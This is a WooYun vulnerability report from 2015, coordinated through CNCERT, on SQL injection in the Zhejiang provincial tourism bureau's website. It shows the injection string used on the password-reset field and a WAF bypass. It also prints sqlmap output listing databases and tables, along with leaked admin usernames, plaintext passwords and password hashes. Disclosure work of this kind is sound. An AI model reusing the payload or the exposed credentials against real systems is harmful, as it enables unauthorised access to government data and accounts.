当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-098367

漏洞标题:浙江省旅游局SQL注射漏洞可导致全站数据库泄露(waf无效)

相关厂商:浙江省旅游局

漏洞作者: Ztz

提交时间:2015-02-26 10:09

修复时间:2015-04-13 16:58

公开时间:2015-04-13 16:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-02-26: 细节已通知厂商并且等待厂商处理中
2015-03-02: 厂商已经确认,细节仅向厂商公开
2015-03-12: 细节向核心白帽子及相关领域专家公开
2015-03-22: 细节向普通白帽子公开
2015-04-01: 细节向实习白帽子公开
2015-04-13: 细节向公众公开

简要描述:

tourzj.gov.cn 无效WAF,SQL注射。已经有入侵痕迹。

详细说明:

捕获3.PNG


重置密码时,输入无效身份证,返回查询失败,输入无效身份证+'or'1'='1返回重置成功,随便SELECT一个表,爆错误信息,及物理路径。

捕获2.PNG


e:\web\dyks\Returnpsw.aspx.cs

捕获1.PNG


然后我们对域名进行IP查询,没有加速节点,基本可以认为获得的是服务器真实IP。

捕获24.PNG


反向查询绑定域名,多达24个,从某分站找到爆物理路径漏洞知服务器结构均类似e:\web\dyks\

捕获4.PNG


上sqlmap,发现WAF根本没用,直接不跟进redirect就行,WAF主页safe3.com.cn不能访问,应该是个已经停止维护的WAF。

pwd	username
851013007	pxw


UserName	Pwd	LastLogTime
admin	1111	02 13 2015 \\?a05:55PM


UserName	gUserName
xqw	xieqw.lyj
yjg	yejg.lyj
zyan	zyan.lyj
zyin	zhangy.lyj


username	uid	password	adminid	accessmasks	email
root \\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0	1	141cd721276e505f50570370f7c9089f	1	0	\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0
xuxin2007 \\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0	2	a231ecc1ffc93b9e5bdcd4aed8febc0b	0	0	[email protected] \\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0
xnwy \\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0	3	f2e7366be1af7d3a78266f22f1406d99	0	0	[email protected] \\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0
0otian \\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0	4	f40e64bfac54692136c50f006d50aa77	0	0	[email protected] \\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0
zhangsha9095 \\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0	5	5cd76ba28a1a956c01e7f38fafbf2411	0	0	[email protected] \\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0
浙江旅游者 \\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0	6	d1d089c5240b8c9a4951c33f174ccacf	0	0	[email protected] \\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0
xvesong \\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0	7	23202318b106a507e3339ddc96ac3b29	0	0	[email protected] \\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0


AdminID	AdminPSW	Id	Name
admin \\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0	zjslyj	1	张序心 \\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0
87994999 \\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0	zjslyj	5	办公室 \\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0\\?a0


开始找敏感信息,部分admin用户密码。(提取自软件日志,未下载,已经全部删除,清空剪贴板,格盘5遍,重装系统,硬盘去磁,拆碎丢了。)

捕获6.PNG


贴心服务,本来对满表的拼音缩写犯头疼,这页面倒好,哪个是哪个全告诉咱了。
吐槽一下,这个表真的是见到过的最乱的表没有之一。要不就是拼音缩写的表名,要不就是拼写错误的英文,什么Blanace(Balance),什么Posscode(Postcode)满天飞,你又不是ACCESS装什么装!

漏洞证明:

database management system users password hashes:
[*] root [1]:
    password hash: NULL
[*] tourdb [1]:
    password hash: NULL
available databases [55]:
[*] 12301
[*] Assessment
[*] basedb
[*] basedbplace
[*] bwh
[*] car
[*] ChangXing
[*] Complaint
[*] cw
[*] DBTest
[*] Financial
[*] GlobalDataBase
[*] GovAffair
[*] Guide
[*] HAReport
[*] hjz
[*] HotelManage
[*] InfoPubSystem
[*] InfoReported
[*] ItemDynamic
[*] Leader
[*] lky
[*] master
[*] model
[*] msdb
[*] new12301
[*] Survey_hz
[*] Survey_zj
[*] tempdb
[*] TenHundredThouand
[*] TourItemManagement
[*] TourManage
[*] TourPlan
[*] tourzjcenterdb
[*] travel
[*] travelagencyty
[*] TravelService
[*] ts2009
[*] ts2010
[*] ts2011
[*] ts2012
[*] ts2013
[*] ts2014
[*] ts2015
[*] txl
[*] vhost
[*] weboadb
[*] WeiXin
[*] wenzhoudb
[*] wzdben
[*] YQTourCenterDB
[*] zjlypxw
[*] zjlypxwbbs
[*] zsweboadb
[*] ZY_HeSheng


back-end DBMS: Microsoft SQL Server 2005
Database: zjlypxw
[170 tables]
+---------------------------------------+
| Admin_User                            |
| AdsInfo                               |
| CQ_Videos_Text                        |
| Certificate_Info                      |
| D99_CMD                               |
| D99_REG                               |
| D99_Tmp                               |
| Dict_List                             |
| Dict_Value                            |
| ExamResult                            |
| GMAP                                  |
| JC_Info                               |
| KJ_List                               |
| Link_Info                             |
| MyJCList                              |
| MyKJList                              |
| MyVideoList                           |
| News_Info                             |
| PXJC_Info                             |
| Pay_List                              |
| Table_Info                            |
| TalentPool                            |
| TestGroup_Trans                       |
| TestPaper_Detail                      |
| TestPaper_List                        |
| TestPaper_Type                        |
| TestUser_Detail                       |
| TestUser_Trans                        |
| Test_GroupInfo                        |
| Test_Pool                             |
| Train_Detail                          |
| Train_List                            |
| User_Info                             |
| Video_Info                            |
| YP_INFO                               |
| ZP_INFO                               |
| area                                  |
| bbs_goods                             |
| bbs_goodsattachments                  |
| bbs_goodscategories                   |
| bbs_goodscreditrules                  |
| bbs_goodsleavewords                   |
| bbs_goodsrates                        |
| bbs_goodstags                         |
| bbs_goodstradelogs                    |
| bbs_goodsusercredits                  |
| bbs_shopcategories                    |
| bbs_shoplinks                         |
| bbs_shops                             |
| bbs_shopthemes                        |
| city                                  |
| province                              |
| sysdiagrams                           |
| tourdb.Book_Info                      |
| tourdb.Examtest                       |
| tourdb.JobList                        |
| tourdb.JobSetting                     |
| tourdb.JobUnitList                    |
| tourdb.JobUserList                    |
| tourdb.MySave                         |
| tourdb.NewPxw_AdminUser               |
| tourdb.NewPxw_Rote                    |
| tourdb.NewPxw_RoteDetail              |
| tourdb.NewsAttach                     |
| tourdb.NewsInfo                       |
| tourdb.NewsType                       |
| tourdb.OrderInfo                      |
| tourdb.OrderInfo_Detail               |
| tourdb.Pxw_ClassDetail                |
| tourdb.Pxw_Collection                 |
| tourdb.Pxw_OrderRoad                  |
| tourdb.Pxw_Teacher                    |
| tourdb.Pxw_Test0                      |
| tourdb.Pxw_UserInfo                   |
| tourdb.Pxw_class                      |
| tourdb.SendOnTimeWB                   |
| tourdb.SendToPxw                      |
| tourdb.ShopCar                        |
| tourdb.Study_Pack                     |
| tourdb.Study_online                   |
| tourdb.TX_AccountInfo                 |
| tourdb.Teacher_Class                  |
| tourdb.Teacher_pxb                    |
| tourdb.Test_PaperInfo_2012            |
| tourdb.Test_QuestionInfo_2012         |
| tourdb.UnitSave                       |
| tourdb.UserSave                       |
| tourdb.User_BookAddress               |
| tourdb.WB_AccountInfo                 |
| tourdb.abc                            |
| tourdb.abcd                           |
| tourdb.bbs_admingroups                |
| tourdb.bbs_adminvisitlog              |
| tourdb.bbs_advertisements             |
| tourdb.bbs_announcements              |
| tourdb.bbs_attachments                |
| tourdb.bbs_attachpaymentlog           |
| tourdb.bbs_attachtypes                |
| tourdb.bbs_banned                     |
| tourdb.bbs_bbcodes                    |
| tourdb.bbs_bonuslog                   |
| tourdb.bbs_creditslog                 |
| tourdb.bbs_debatediggs                |
| tourdb.bbs_debates                    |
| tourdb.bbs_failedlogins               |
| tourdb.bbs_favorites                  |
| tourdb.bbs_forumfields                |
| tourdb.bbs_forumlinks                 |
| tourdb.bbs_forums                     |
| tourdb.bbs_help                       |
| tourdb.bbs_invitation                 |
| tourdb.bbs_locations                  |
| tourdb.bbs_login_temp                 |
| tourdb.bbs_medals                     |
| tourdb.bbs_medalslog                  |
| tourdb.bbs_moderatormanagelog         |
| tourdb.bbs_moderators                 |
| tourdb.bbs_myattachments              |
| tourdb.bbs_myposts                    |
| tourdb.bbs_mytopics                   |
| tourdb.bbs_navs                       |
| tourdb.bbs_notices                    |
| tourdb.bbs_online                     |
| tourdb.bbs_onlinelist                 |
| tourdb.bbs_onlinetime                 |
| tourdb.bbs_orders                     |
| tourdb.bbs_paymentlog                 |
| tourdb.bbs_pms                        |
| tourdb.bbs_polloptions                |
| tourdb.bbs_polls                      |
| tourdb.bbs_postdebatefields           |
| tourdb.bbs_postid                     |
| tourdb.bbs_posts1                     |
| tourdb.bbs_ratelog                    |
| tourdb.bbs_scheduledevents            |
| tourdb.bbs_searchcaches               |
| tourdb.bbs_smilies                    |
| tourdb.bbs_statistics                 |
| tourdb.bbs_stats                      |
| tourdb.bbs_statvars                   |
| tourdb.bbs_tablelist                  |
| tourdb.bbs_tags                       |
| tourdb.bbs_templates                  |
| tourdb.bbs_topicidentify              |
| tourdb.bbs_topics                     |
| tourdb.bbs_topictagcaches             |
| tourdb.bbs_topictags                  |
| tourdb.bbs_topictypes                 |
| tourdb.bbs_trendstat                  |
| tourdb.bbs_userfields                 |
| tourdb.bbs_usergroups                 |
| tourdb.bbs_users                      |
| tourdb.bbs_users_token                |
| tourdb.bbs_words                      |
| tourdb.book_OrderNo                   |
| tourdb.jfwbaccountinfo                |
| tourdb.jfweibolist                    |
| tourdb.old_bbs_users                  |
| tourdb.online_Pay                     |
| tourdb.pxw_UserClass                  |
| tourdb.pxw_UserSet                    |
| tourdb.pxw_UserTypeSet                |
| tourdb.pxw_noteinfo                   |
| tourdb.pxw_savemidlist                |
| tourdb.pxw_weibolist                  |
| tourdb.pxw_weibouserinfo              |
| tourdb.test                           |
| tourdb.v_Test_PaperInfo_2012_PType    |
| tourdb.v_Test_QuestionInfo_2012_qType |
| tourdb.weibosendontime                |
+---------------------------------------+


back-end DBMS: Microsoft SQL Server 2005
Database: bwh
[41 tables]
+------------------------+
| Admin                  |
| GlobalNews             |
| GlobalType             |
| Lyb                    |
| dnt_admingroups        |
| dnt_adminvisitlog      |
| dnt_advertisements     |
| dnt_announcements      |
| dnt_attachments        |
| dnt_attachtypes        |
| dnt_bbcodes            |
| dnt_creditslog         |
| dnt_failedlogins       |
| dnt_favorites          |
| dnt_forumfields        |
| dnt_forumlinks         |
| dnt_forums             |
| dnt_medals             |
| dnt_medalslog          |
| dnt_moderatormanagelog |
| dnt_moderators         |
| dnt_online             |
| dnt_onlinelist         |
| dnt_paymentlog         |
| dnt_pms                |
| dnt_polls              |
| dnt_postid             |
| dnt_posts1             |
| dnt_ratelog            |
| dnt_searchcaches       |
| dnt_smilies            |
| dnt_statistics         |
| dnt_tablelist          |
| dnt_templates          |
| dnt_topics             |
| dnt_userfields         |
| dnt_usergroups         |
| dnt_users              |
| dnt_words              |
| dtproperties           |
| hy                     |
+------------------------+


贴出部分表名。(提取自软件日志,未下载,已经全部删除,清空剪贴板,格盘5遍,重装系统,硬盘去磁,拆碎丢了。)
入侵痕迹:

back-end DBMS: Microsoft SQL Server 2005
Database: zjlypxw
[170 tables]
+---------------------------------------+
| Admin_User                            |
| AdsInfo                               |
| CQ_Videos_Text                        |
| Certificate_Info                      |
| D99_CMD                               |
| D99_REG                               |
| D99_Tmp                               |


出现D99_*表名,有人尝试执行命令。

捕获7.PNG


这里够奇葩,也不知是被人入侵了还是管理员自己留后门,加了一个howareyou后门密码在网页源码里,可惜语法没写好,不能用,还影响正常用户登录。

修复方案:

1.重新整理一下数据库结构。
2.排查shell
3.做好过滤
4.加强安全意识,不要明码储存密码,使用复杂密码。
能给个20?

版权声明:转载请注明来源 Ztz@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-03-02 16:01

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给浙江分中心,由其后续协调网站管理单位处置。

最新状态:

暂无